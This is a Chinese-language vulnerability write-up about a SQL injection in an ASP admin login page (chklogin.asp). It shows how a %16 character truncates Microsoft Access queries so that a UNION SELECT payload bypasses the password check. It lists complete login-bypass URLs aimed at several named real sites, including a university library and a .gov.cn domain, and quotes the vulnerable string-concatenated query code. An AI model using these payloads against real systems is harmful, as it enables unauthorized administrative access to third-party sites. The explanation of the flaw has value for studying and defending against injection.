从一个注入点到ACCESS查询截断--16

previous page next page 


  1. http://lib.hebiace.edu.cn/dzb/admin/chklogin.asp?admin=1'%20and%20exists%20(select%20*%20from%20admin1)%20and%20'1'='1&password=1&Submit=%c8%b7%20%b6%a8

用此方法也可以快速判断是否存在注入

order by是有4个字段:

  1. http://lib.hebiace.edu.cn/dzb/admin/chklogin.asp?password=1&Submit=%c8%b7%20%b6%a8&admin=1%27%20UNION%20ALL%20SELECT%20123%2CNULL%2CNULL%2CNULL%20FROM%20MSysAccessObjects%16

  1. http://www.botou.gov.cn/yj/admin/chklogin.asp?password=1&Submit=%c8%b7%20%b6%a8&admin=1%27%20UNION%20ALL%20SELECT%20123%2CNULL%2CNULL%2CNULL%20FROM%20MSysAccessObjects%16

  1. http://210.41.160.9:84/huang/nbzy/hjyj/admin/chklogin.asp?password=1&Submit=%c8%b7%20%b6%a8&admin=1%27%20UNION%20ALL%20SELECT%20123%2CNULL%2CNULL%2CNULL%20FROM%20MSysAccessObjects%16

  1. http://www.qzgl.cn/admin/chklogin.asp?password=1&Submit=%c8%b7%20%b6%a8&admin=1%27%20UNION%20ALL%20SELECT%20123%2CNULL%2CNULL%2CNULL%20FROM%20MSysAccessObjects%16

上面链接都是直接进入系统:


顺带简单分析一下上面的情况,因为

  1. admin=1%27%20UNION%20ALL%20SELECT%20123%2CNULL%2CNULL%2CNULL%20FROM%20MSysAccessObjects%16
后面使用了一个%16,使用其它字符的话大部分都无法直接进入系统。

看一下%16是个啥:



看下代码:

code 区域
admin1=request("admin")

password1=request("password")

set rs=server.CreateObject("ADODB.RecordSet")

sql="select * from admin where admin='" & admin1 & "' and password='"&encrypt(password1)&"'"

查询原本拼凑出来的是:

  1. select * from admin where admin=’1' UNION ALL SELECT 123,NULL,NULL,NULL FROM MSysAccessObjects (%16转换为的字符,乌云不让贴) and password=1
在这个地方%16可以截断access的sql查询!

等同于查询变成了:
  1. select * from admin where admin=’ 1' UNION ALL SELECT 123,NULL,NULL,NULL FROM MSysAccessObjects
因为admin表结构如下:


所以使用了联结查询就等于“查询出了一条数据:id=123其它字段都为空”

后面部分的代码,不多说了没什么特别的

code 区域
rs.open sql,conn,1

if rs.eof and rs.bof then

response.write"<SCRIPT language=JavaScript>alert('用户名或密码不正确!');"

response.write"javascript:history.go(-1)</SCRIPT>"

response.end

else

session("admin")=rs("admin")

session("username")=rs("admin")

session("userid")=rs("id")

session("password")=rs("password")

session("aleave")=rs("aleave")

				Session("eWebEditor_User") = "admin"

				Session("eWebEditor_Version") = "2.8.0"

response.redirect "admin.asp"

end if

rs.close

set rs=nothing


本地测试下:
表结构:

测:1:

  1. SELECT * from admin where username='admin' and password='123';

测试2(加了%16字符):

很明显后面密码的条件已经被截断了。

再测试mysql直接报错

再测试下mssql,%16直接被忽视

  

previous page start next page